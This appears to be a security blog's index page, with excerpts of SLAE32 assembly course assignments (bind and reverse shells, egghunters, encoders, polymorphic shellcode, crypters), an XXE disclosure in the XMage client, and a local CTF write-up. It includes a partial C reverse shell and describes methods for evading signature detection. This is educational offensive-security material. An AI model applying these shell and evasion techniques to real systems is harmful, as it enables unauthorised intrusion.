Posts

Showing posts from 2020

SLAE32 - Assignment 7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Crypters For this assignment, students are tasked with creating a custom shellcode crypter.
Requirements: Create a custom crypter like the one shown in the "crypters" videoFree to use any existing encryption schemaCan use any programming language Task 7 was... interesting. By far the most time spent headbanging (to metal and against metal), while also sporting the biggest facepalm.
My original plan did end up being the outcome, although it took a detour and ended up at the same result. For this task I decided to go the AES CBC route-- it's a common and easily implemented encryption scheme. Using this article, I was able to come up with a PoC encryption / decryption script pretty quickly. I…

SLAE32 - Assignment 5

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Shellcode Analysis This task requests students to disassemble and analyze at least three shellcode samples created by metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc had not yet been combined into msfvenom, which is what I'll obviously use.

Requirements:
Take up at least 3 shellcode samples created using Msfpayload for linux/x86Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcodePresent your analysis I decided to perform analysis on the following three payloads: shell_reverse_tcp (a non-staged reverse shell)shell_bind_tcp (a non-staged bind shell)adduser(a payload for adding a user, duh) Although not the …

SLAE32 - Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Polymorphic Shellcodes Assignment 6 required students to take three shellcodes from shellstorm and create polymorphic versions of them.

Requirements:

Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matchingThe polymorphic versions cannot be larger 150% of the existing shellcode Shellcode 1: The first shellcode I chose for this assignment was a shellcode which adds a value to an /etc/hosts file, available here
I like the idea here, as it's a little out of the normal shellcode tactic. It's not 'covert' but it certainly isn't just spawning /bin/bash :shrug The original shellcode is 77 bytes, so it's not huge, especially considering the…

SLAE32 - Assignment 4

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Encoders For this assignment, students were tasked with creating a custom encoding scheme, such as the "Insertion Encoder" from the course.
Requirements: Create a custom encoding scheme like the “Insertion Encoder”Write a PoC using execve-stack as the shellcode to encode with your schema and execute Pretty simple! For this task, I decided to start with a simple ROT cipher as we're simply trying to avoid signature based detections. In python, that might look like this: >>> input = 1 >>> rotate = 13 >>> out = input + rotate >>> print(out) 14 That's pretty... expected, haha. Translated to asm, that's still very simple and there's a number of ways…

SLAE32 - Assignment 3

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
Egghunters! Woooo! I love egghunters, I think they're super cool.
There's a lot of information out there on the web about egghunters, and some really good papers too (e.g. Skape). If you're totally unfamiliar and just want the tldr, here's the gist of it:

Let's say you are testing some sort of server application, maybe it's an FTP app. The application has a couple different commands that accept some input, but when you send certain data to one of the commands, the application crashes in a way that allows you to control the flow of execution. "Hooray!" you might be thinking, "Now I can send my payload!"

To your dismay, after sending payload after payload you …

SLAE32 - Assignment 2

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Reverse ShellRequirements: Connects to configured IP and portExecs shell on successful connectionIP and port should be 'easily' configurable As with the TCP Bind shell from assignment one, I decided the best bet was to write out a reverse shell in C. There's a million resources out there, and the code I came up with is as follows: /* C reverse shell for SLAE */                     #include <unistd .h=""> #include <netinet in.h=""> #include <sys socket.h=""> #include <sys types.h=""> #define rhost "127.0.0.1" #define rport "4444"  int main(int argc, char *argv[])                  {���������������������…

SLAE32 - Assignment 1

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments
TCP_Bind ShellRequirements: Binds to a portExecutes a shell on incoming connectionPort should be 'easily' configurable For this assignment, I started like many others and first disassembled metasploit shellcode. It had the basic principals I expected, but to my dismay it didn't really help me to write my own-- MSF's shellcodes are well optimized, so I felt like I'd basically just be copying code, rather than learning to implement it myself. I decided to first write a bind shell in C, as it's low level and I'd be (essentially) making the same calls:
// Shell_bind_tcp // For SLAE32 // Howard McGreehan #include <sys/socket.h> #include <unistd.h> #include <netinet…

13 - XXE in XMage Client <= 1.4.42V7

Image
XXE in XMage Client <= 1.4.42V7
Lately, I've been doing quite a bit of SCR engagements for work. In my efforts to become a little better, I've been doing more on my own time. I enjoy code review, but alas like anything else it can get boring at times. In order to make it not quite so boring, I look for applications that interest me. One application I started poking around with is named XMage-- it's a java application that a few friends and I use to play MtG. While admittedly a little bit clunky, XMage does a phenomenal job at rules enforcement, something similar clients don't even attempt. In fact, so good a job it's likely you'll find out that some cards really don't work like you think they do (total buzzkill).
XMage is open source and has some great documentation. I got the latest build set up in IDEA with the help of maven and began by running SpotBugs against the Client and Server. To my dismay, the results were mega boring. Instead of just trusting t…

12 - DC207 April CTF

Image
DC207's April 2020 CTF Recently I took part in a CTF put on by my local DefCon group. I had a lot of fun, learned some cool stuff and decided to do a writeup as I acquired all the flags. The CTF was split into four categories, 'Fun Fun Fun Fun', 12 puzzle-style questions, and three virtual machines. Fun Fun Fun Fun#1 If only it were that easy Solve the puzzle for the solution:
yetz{lhfxpaxkxhoxkmaxvbiaxk}
It's a caesar cipher! ROT[ate]7!
flag{somewhereoverthecipher} #2 Horse Meatballs Attached is the clue. Decode the message, the flag is the name of the source of the content: notavirus.wav
Hmm, well, since it's not a virus I downloaded the file and opened it. After collecting my computer parts and reassembling it after I threw it out the window in my haste to disconnect it from my network, I realized the beeping noises were *gasp*, MORSE COOOOooode. Using morsecode.world, you can upload morse code files for decoding. Or, if you're spooked and would rather not u…